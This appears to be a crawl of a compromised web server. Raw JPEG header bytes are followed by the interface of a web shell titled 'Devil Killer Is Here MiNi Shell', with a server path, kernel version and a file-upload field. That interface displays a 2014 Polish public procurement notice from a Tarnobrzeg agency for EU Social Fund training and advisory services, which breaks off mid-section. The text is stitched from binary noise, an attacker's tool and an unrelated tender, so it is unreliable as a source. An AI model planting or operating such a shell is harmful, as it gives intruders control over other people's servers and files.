JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141029/227639-N-2014.html

<p class="kh_header"><b>Tarnobrzeg: Usługa doradztwa kluczowego, specjalistycznego oraz przeprowadzenia szkoleń kluczowych i specjalistycznych  realizowanych przez Regionalny Ośrodek Europejskiego Funduszu Społecznego w Tarnobrzegu w zakresie prawidłowej realizacji i rozliczania projektów współfinansowanych ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 227639 - 2014; data zamieszczenia: 29.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tarnobrzeska Agencja Rozwoju Regionalnego S.A. , ul. Dąbrowskiej 15, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 15 8220022, faks 15 8220022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa doradztwa kluczowego, specjalistycznego oraz przeprowadzenia szkoleń kluczowych i specjalistycznych  realizowanych przez Regionalny Ośrodek Europejskiego Funduszu Społecznego w Tarnobrzegu w zakresie prawidłowej realizacji i rozliczania projektów współfinansowanych ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: Usługa trenerska polegająca na: przeprowadzeniu 1, jednodniowego szkolenia kluczowego, zwanego dalej szkoleniem pn. Zamykanie projektów współfinansowanych z EFS (ewaluacja, archiwizacja, kontrola) dla instytucji będących beneficjentami EFS (w tym organizacji pozarządowych, jednostek samorządu terytorialnego i ich jednostek organizacyjnych, przedsiębiorców i innych mogących aplikować i realizować projekty w ramach Programu Operacyjnego Kapitał Ludzki). Wymiar szkolenia 8 godzin (1 godz. to 45 min.) dla grupy nie mniejszej niż 10 i nie większej niż 20 osób.Wykonawca zobowiązany jest: Zapewnić przeprowadzenie szkolenia przez osobę posiadającą następujące kwalifikacje i umiejętności:
- Wykształcenie:
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455),
            - Posiadanie certyfikatu wiedzy Krajowego Ośrodka Europejskiego Funduszu 
   Społecznego,
            -    Doświadczenie zawodowe:
	   min. 2-letnie doświadczenie w z zakresu problematyki EFS, zarządzania projektami,
	   min. 3-letnie doświadczenie w świadczeniu usług szkoleniowych, w tym przeprowadzenie co najmniej 300 godzin szkoleń,
    -    Umiejętności techniczne:
	  znajomość technik prezentacji,
	   obsługa komputera, projektora multimedialnego, rzutnika. 
Przeprowadzić szkolenie w dzień roboczy (od poniedziałku do piątku), w terminie uzgodnionym z Zamawiającym, nie później niż do dnia 31.12.2014r., w godzinach: rozpoczęcie nie wcześniej niż o godz. 10:00, zakończenie nie później niż 17:00;
Przeprowadzić szkolenie w miejscu wskazanym przez Zamawiającego na terenie jednego z powiatów: tarnobrzeskiego, mieleckiego, niżańskiego, kolbuszowskiego, stalowowolskiego lub m. Tarnobrzeg.
Przygotować program szkolenia, konspekt szkolenia (wzór dostarczy Zamawiający) oraz materiały szkoleniowe, zgodne z tematyką szkolenia i dostosowane do potrzeb uczestników szkolenia  i przedłożyć Zamawiającemu do akceptacji nie później niż na 15 dni przed przeprowadzeniem szkolenia oraz dokonać odpowiednich poprawek na żądanie Zamawiającego w terminie 3 dni od otrzymania żądania Zamawiającego,
Przygotować prezentację w programie Microsoft PowerPoint obejmującą zagadnienia omawiane na szkoleniu.
Przeprowadzić wśród uczestników szkolenia ankiety: kwalifikacyjną i ewaluacyjną. Dokumenty niezbędne do przeprowadzenia ankiet dostarczy Zamawiający,
Prowadzić listę obecności uczestniczących w szkoleniu. Listę obecności dostarczy Zamawiający.
Po zakończeniu szkolenia przekazać uczestnikom szkolenia certyfikat potwierdzający uczestnictwo w szkoleniu. Certyfikat ukończenia szkolenia dostarczy Zamawiający.
Oznaczyć materiały szkoleniowe (szablon prezentacji, program, konspekt szkolenia oraz inne materiały szkoleniowe) w sposób wskazany przez Zamawiającego.
Zamawiający zobowiązany jest:
-   przeprowadzić rekrutację uczestników szkolenia,
- przekazać uczestnikom szkolenia informację o terminie i miejscu przeprowadzenia szkolenia,
- zapewnić salę szkoleniową wyposażoną w sprzęt niezbędny do przeprowadzenia szkolenia (rzutnik, ekran, flipchart i inne),
- przygotować certyfikaty ukończenia szkolenia.
Zadanie  2:  Usługa  trenerska  polegająca na: 
przeprowadzeniu 2, jednodniowych szkoleń pn. Aspekty księgowe w projektach współfinansowanych z Europejskiego Funduszu Społecznego dla instytucji będących beneficjentami EFS (w tym organizacji pozarządowych, jednostek samorządu terytorialnego i ich jednostek organizacyjnych, przedsiębiorców i  innych mogących aplikować i realizować projekty w ramach Programu Operacyjnego Kapitał Ludzki).
Wymiar każdego ze szkoleń to 8 godzin (1 godz. to 45 min.) dla grupy nie mniejszej niż 10 i nie większej niż 20 osób.
Wykonawca zobowiązany jest:
- zapewnić przeprowadzenie szkolenia przez osobę posiadającą następujące kwalifikacje i umiejętności:
- Wykształcenie
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455), kierunek wykształcenia zgodny ze specjalizacją w jakiej prowadzone jest szkolenie tj. ekonomiczny lub jako zamiennik wykształcenia wyższego może być traktowane co najmniej 5 - letnie doświadczenie zawodowe w danej dziedzinie.
- Doświadczenie zawodowe
min. 3-letnie doświadczenie zawodowe (w tym co najmniej ostatnie 2 lata w dziedzinie, która będzie dotyczyć tematyki szkolenia oraz przeprowadzenie co najmniej 100 godzin szkoleń w tym zakresie),
- Umiejętności techniczne:
znajomość technik prezentacji, obsługa komputera, projektora multimedialnego, rzutnika. 
Przeprowadzić szkolenia w dni robocze (od poniedziałku do piątku), w terminie uzgodnionym z Zamawiającym, nie później niż do dnia 31.12.2014r., w godzinach: rozpoczęcie nie wcześniej niż o godz. 10:00, zakończenie nie później niż 17:00;
Przeprowadzić szkolenia w miejscu wskazanym przez Zamawiającego na terenie jednego z powiatów: tarnobrzeskiego, mieleckiego, niżańskiego, kolbuszowskiego, stalowowolskiego lub m. Tarnobrzeg.
Przygotować program szkolenia, konspekt szkolenia (wzór dostarczy Zamawiający) oraz materiały szkoleniowe, zgodne z tematyką szkolenia i dostosowane do potrzeb uczestników szkolenia i przedłożyć Zamawiającemu do akceptacji nie później niż na 15 dni przed przeprowadzeniem pierwszego ze szkoleń oraz dokonać odpowiednich poprawek na żądanie Zamawiającego w terminie 3 dni od otrzymania żądania Zamawiającego,
Przygotować prezentację w programie Microsoft PowerPoint obejmującą zagadnienia omawiane na szkoleniu 
przeprowadzić wśród uczestników szkolenia ankiety: kwalifikacyjną i ewaluacyjną. Dokumenty niezbędne do przeprowadzenia ankiet dostarczy Zamawiający,
Prowadzić listę obecności uczestniczących w szkoleniu. Listę obecności dostarczy Zamawiający.
Po zakończeniu szkolenia przekazać uczestnikom szkolenia certyfikat potwierdzający uczestnictwo w szkoleniu. Certyfikat ukończenia szkolenia dostarczy Zamawiający, 
Oznaczyć materiały szkoleniowe (szablon prezentacji, program, konspekt szkolenia oraz inne materiały szkoleniowe) w sposób wskazany przez Zamawiającego.
Zamawiający zobowiązany jest:
-  przeprowadzić rekrutację uczestników szkolenia,
- przekazać uczestnikom szkolenia informację o terminie i miejscu przeprowadzenia    
   szkolenia,
- zapewnić salę szkoleniową wyposażoną w sprzęt niezbędny do przeprowadzenia 
   szkolenia (rzutnik, ekran, flipchart i inne), catering na szkoleniu
-  przygotować certyfikaty ukończenia szkolenia.
Zadanie 3: Usługa  trenerska  polegająca  na: 
- przeprowadzeniu 1 jednodniowego szkolenia pn. Zamówienia publiczne w projektach współfinansowanych z Europejskiego Funduszu Społecznego dla instytucji będących beneficjentami EFS (w tym organizacji pozarządowych, jednostek samorządu terytorialnego i ich jednostek organizacyjnych, przedsiębiorców i  innych mogących aplikować i realizować projekty w ramach Programu Operacyjnego Kapitał Ludzki).
- wymiar szkolenia 8 godzin (1 godz. to 45 min.) dla grupy nie mniejszej niż 10 i nie większej niż 20 osób.
Wykonawca zobowiązany jest: zapewnić przeprowadzenie szkolenia przez osobę posiadającą następujące kwalifikacje i umiejętności:
Wykształcenie ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455), kierunek wykształcenia zgodny ze specjalizacją w jakiej prowadzone jest szkolenie tj. prawniczy lub jako zamiennik wykształcenia wyższego może być traktowane co najmniej 5 - letnie doświadczenie zawodowe w danej dziedzinie.
- Doświadczenie zawodowe: min. 3-letnie doświadczenie zawodowe (w tym co najmniej ostatnie 2 lata w dziedzinie, która będzie dotyczyć tematyki szkolenia oraz przeprowadzenie co najmniej 100 godzin szkoleń w tym zakresie),
 Umiejętności techniczne: znajomość technik prezentacji, obsługa komputera, projektora multimedialnego, rzutnika. 
Przeprowadzić szkolenie w dzień roboczy (od poniedziałku do piątku), w terminie uzgodnionym z Zamawiającym, nie później niż do dnia 31.12.2014r., w godzinach: rozpoczęcie nie wcześniej niż o godz. 10:00, zakończenie nie później niż 17:00;
Przeprowadzić szkolenie w miejscu wskazanym przez Zamawiającego na terenie jednego z powiatów: tarnobrzeskiego, mieleckiego, niżańskiego, kolbuszowskiego, stalowowolskiego lub m. Tarnobrzeg.
Przygotować program szkolenia, konspekt szkolenia kluczowego (wzór dostarczy Zamawiający) oraz materiały szkoleniowe, zgodne z tematyką szkolenia i dostosowane do potrzeb uczestników szkolenia kluczowego i przedłożyć Zamawiającemu do akceptacji nie później niż na 15 dni przed przeprowadzeniem szkolenia oraz dokonać odpowiednich poprawek na żądanie Zamawiającego w terminie 3 dni od otrzymania żądania Zamawiającego, Przygotować prezentację w programie Microsoft PowerPoint obejmującą zagadnienia omawiane na szkoleniu,Przeprowadzić wśród uczestników szkolenia ankiety: kwalifikacyjną i ewaluacyjną. Dokumenty niezbędne do przeprowadzenia ankiet dostarczy Zamawiający,
Prowadzić listę obecności uczestniczących w szkoleniu. Listę obecności dostarczy Zamawiający. Po zakończeniu szkolenia przekazać uczestnikom szkolenia certyfikat potwierdzający uczestnictwo w szkoleniu. Certyfikat ukończenia szkolenia dostarczy Zamawiający, Oznaczyć materiały szkoleniowe (szablon prezentacji, program, konspekt szkolenia oraz inne materiały szkoleniowe) w sposób wskazany przez Zamawiającego.
- Zamawiający zobowiązany jest:
przeprowadzić rekrutację uczestników szkolenia,
przekazać uczestnikom szkolenia informację o terminie i miejscu przeprowadzenia szkolenia,
zapewnić salę szkoleniową wyposażoną w sprzęt niezbędny do przeprowadzenia szkolenia (rzutnik, ekran, flipchart i inne), catering dla uczestników szkolenia, przygotować certyfikaty ukończenia szkolenia.
Zadanie 4: Doradztwo kluczowe w ramach Usługi 6
łączny wymiar doradztwa - 20 godzin (1 godzina to 60 min.) dla instytucji będących beneficjentami EFS (w tym organizacji pozarządowych, jednostek samorządu terytorialnego i ich jednostek organizacyjnych, przedsiębiorców i  innych mogących aplikować i realizować projekty w ramach Programu Operacyjnego Kapitał Ludzki). 
Doradztwo rozumie się jako proces, w którym doradca pomaga osobie uczestniczącej w doradztwie zrozumieć problem i wspólnie z tą osobą znaleźć jego rozwiązanie. Doradztwo ma charakter skonkretyzowanej porady odnoszącej się do konkretnej sprawy, opartej na danych i materiałach przekazanych przez osobę uczestniczącą w doradztwie. 
Forma udzielania doradztwa:
1.	Doradztwo bezpośrednie - doradztwo świadczone osobiście przez doradcę klientowi/klientom w siedzibie Ośrodka lub innym dogodnym dla klienta miejscu.
2.	Doradztwo pośrednie - doradztwo świadczone drogą elektroniczną (za pomocą poczty elektronicznej).
3.	Indywidualne.
4.   Grupowe, w tym w formie warsztatów doradczych,  maksymalna liczba uczestników to 10 osób. Warsztaty doradcze muszą dotyczyć konkretnego problemu i być skierowane do jednorodnej grupy odbiorców. 
5.   Wizyta wspierająca - to szczególny rodzaj doradztwa, o charakterze kompleksowym.
Wizyta wspierająca polega na przeanalizowaniu projektu realizowanego przez beneficjenta w trakcie jego trwania w siedzibie beneficjenta lub w miejscu realizacji projektu.
W ramach wizyt wspierających wsparcia powinien udzielać dwuosobowy zespół, w skład którego wchodzi jeden doradca kluczowy.
Celem wizyty wspierającej jest kompleksowe wsparcie beneficjenta w prawidłowej realizacji projektu oraz przygotowanie beneficjenta do kontroli projektu.
Wizyta dzieli się na następujące etapy:
1) diagnostyczny - zapoznanie się z zakresem dokumentacji i działaniami w projekcie. Na tym etapie odbywa się zasadnicza analiza potrzeb. Analiza potrzeb jest realizowana we współpracy z beneficjentem, ale również może wynikać z wstępnego zapoznania się z dokumentacją np. w zakresie potencjalnych luk w zarządzaniu projektem.
2) analityczny - przeanalizowanie wybranej dokumentacji pod kątem zgodności z wymaganiami PO KL.
3) rekomendacyjny - udzielenie rekomendacji i wniosków w celu zminimalizowania ryzyka wystąpienia kosztów niekwalifikowalnych oraz w celu zapewnienia wysokiej jakości procesów w ramach zarządzania projektem.
oraz
4) aplikacyjny - sprawdzenie wdrożenia rekomendacji (fakultatywnie).
Wykonawca zobowiązany jest do prowadzenia Kart doradczych zgodnie ze Standardami działania sieci Regionalnych Ośrodków EFS, w szczególności w przypadku doradztwa indywidualnego, czytelnego podpisu osoby, która korzystała z doradztwa wraz z pieczątką. Wykonawca, po wykonaniu usług doradczych zobowiązany jest do przedstawienia:
- ankiet kwalifikacyjnych do projektu, w przypadku klientów, którzy po raz pierwszy korzystają z usługi doradczej,
- kwestionariuszy ewaluacji doradztwa,
- oświadczeń o wspartych projektach (w ilości zgodnej z Ofertą Regionalnego Ośrodka EFS - do ustalenia z Kierownikiem ROEFS).
Zamawiający w trakcie realizacji zamówienia zobowiązuje się do przekazania wzorów dokumentów służących realizacji usługi doradczej. 
Wykonawca zobowiązany jest: zapewnić przeprowadzenie doradztwa kluczowego przez osobę posiadającą następujące kwalifikacje i umiejętności:
          - Wykształcenie
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455),
- Posiadanie certyfikatu wiedzy Krajowego Ośrodka Europejskiego Funduszu   Społecznego
- Doświadczenie zawodowe: min. 2-letnie doświadczenie zawodowe w tym min. 1 rok doświadczenia w świadczeniu usług o charakterze doradczym oraz min. 1 rok doświadczenia w pozyskiwaniu środków publicznych w szczególności EFS, lub min. 2-letnie doświadczenie zawodowe na stanowisku specjalisty ds. informacji w Regionalnym Ośrodku EFS pod warunkiem spełnienia wymogów w zakresie wykształcenia
Zadanie 5:  Doradztwo specjalistyczne w zakresie prawa zamówień publicznych w łącznym wymiarze 20 godzin (1 godzina to 60 min.). dla instytucji będących beneficjentami EFS (w tym organizacji pozarządowych, jednostek samorządu terytorialnego i ich jednostek organizacyjnych, przedsiębiorców i  innych mogących aplikować i realizować projekty w ramach Programu Operacyjnego Kapitał Ludzki). 
Doradztwo rozumie się jako proces, w którym doradca pomaga klientowi zrozumieć problem i wspólnie z klientem znaleźć jego rozwiązanie. Doradztwo ma charakter skonkretyzowanej porady odnoszącej się do konkretnej sprawy, opartej na danych i materiałach przekazanych przez klienta. 
Forma udzielania doradztwa:
1.	Doradztwo bezpośrednie - doradztwo świadczone osobiście przez doradcę klientowi/klientom w siedzibie Ośrodka lub innym dogodnym dla klienta miejscu.
2.	Doradztwo pośrednie - doradztwo świadczone drogą elektroniczną (za pomocą poczty elektronicznej).
3.	Indywidualne.
4.	Grupowe, w tym w formie warsztatów doradczych,  maksymalna liczba uczestników to 10 osób. Warsztaty doradcze muszą dotyczyć konkretnego problemu i być skierowane do jednorodnej grupy odbiorców. 
Wykonawca zobowiązany jest do prowadzenia Kart doradczych zgodnie ze Standardami działania sieci Regionalnych Ośrodków EFS, w szczególności w przypadku doradztwa indywidualnego, czytelnego podpisu osoby, która korzystała z doradztwa wraz z pieczątką. Wykonawca, po wykonaniu usług doradczych zobowiązany jest do przedstawienia:
- ankiet kwalifikacyjnych do projektu, w przypadku klientów, którzy po raz pierwszy korzystają z usługi doradczej,
- kwestionariuszy ewaluacji doradztwa,
- oświadczeń o wspartych projektach (w ilości zgodnej z Ofertą Regionalnego Ośrodka EFS - do ustalenia z Kierownikiem ROEFS).
Zamawiający w trakcie realizacji zamówienia zobowiązuje się do przekazania wzorów dokumentów służących realizacji usługi doradczej.
Wykonawca zobowiązany jest: zapewnić przeprowadzenie doradztwa kluczowego przez osobę posiadającą następujące kwalifikacje i umiejętności:
-  Wykształcenie
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455), kierunek wykształcenia zgodny ze specjalizacją w jakiej udziela doradztwa tj. prawniczy lub jako zamiennik wykształcenia wyższego może być traktowane co najmniej 5 - letnie doświadczenie zawodowe w danej dziedzinie
-  Doświadczenie zawodowe
min. 3-letnie doświadczenie zawodowe ( w tym co najmniej  ostatnie 2 lata doświadczenia w dziedzinie , w której będzie świadczone doradztwo specjalistyczne).
Dotyczy Zadań 1,2,3,4,5:
Wykonawca będzie zobowiązany do przedłożenia zamawiającemu dokumentów potwierdzających posiadanie przez osoby, które skieruje do wykonania przedmiotu zamówienia wyżej opisanych kwalifikacji i doświadczenia w terminie 7 dni od zawarcia umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 79.41.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy Zadań 1,2,3,4,5:
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy Zadań 1,2,3,4,5:

Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony poprzez złożenie przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu według wzoru - zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy Zadania 1:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej 1 osobą posiadającą:
kwalifikacje trenera kluczowego (posiadającego certyfikat wiedzy Krajowego Ośrodka Europejskiego Funduszu Społecznego) 
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455),
Doświadczenie zawodowe:
min. 2-letnie doświadczenie w z zakresu problematyki EFS, zarządzania projektami,
min. 3-letnie doświadczenie w świadczeniu usług szkoleniowych, w tym przeprowadzenie co najmniej 300 godzin szkoleń,
Umiejętności techniczne:
znajomość technik prezentacji,
obsługa komputera, projektora multimedialnego, rzutnika. 

Dotyczy Zadania 2 i Zadania 3 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej 2 osobami posiadającymi:
kwalifikacje trenerów specjalistycznych w zakresie aspektów księgowych i zamówień publicznych;
Wykształcenie:
ukończone studia pierwszego stopnia w rozumieniu ustawy z dnia 18 marca 2011 r. o zmianie ustawy - Prawo o szkolnictwie wyższym, ustawy o stopniach naukowych i tytule naukowym oraz o stopniach i tytule w zakresie sztuki oraz o zmianie niektórych innych ustaw (Dz. U. 2011 nr 84 poz. 455), kierunek wykształcenia zgodny ze specjalizacją w jakiej prowadzone są szkolenia tj. w przypadku Zadania 2 ekonomiczne, zaś w przypadku Zadania 3 prawnicze lub jako zamiennik wykształcenia wyższego może być traktowane co najmniej 5 - letnie doświadczenie zawodowe w danej dziedzinie.
Doświadczenie zawodowe:
min. 3-letnie doświadczenie zawodowe (w tym co najmniej ostatnie 2 lata w dziedzinie, która będzie dotyczyć tematyki szkolenia oraz przeprowadzenie co najmniej 100 godzin szkoleń w tym zakresie),
Umiejętności techniczne:
- znajomość technik prezentacji,
- obsługa komputera, projektora multimedialnego, rzutnika. 
 
Dotyczy  Zadania 4 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej co najmniej 1 osobą  posiadającą:
kwalifikacje  Doradcy kluczowego (certyfikat wiedzy Krajowego Ośrodka Europejskiego Funduszu Społecznego);
Wykształcenie:
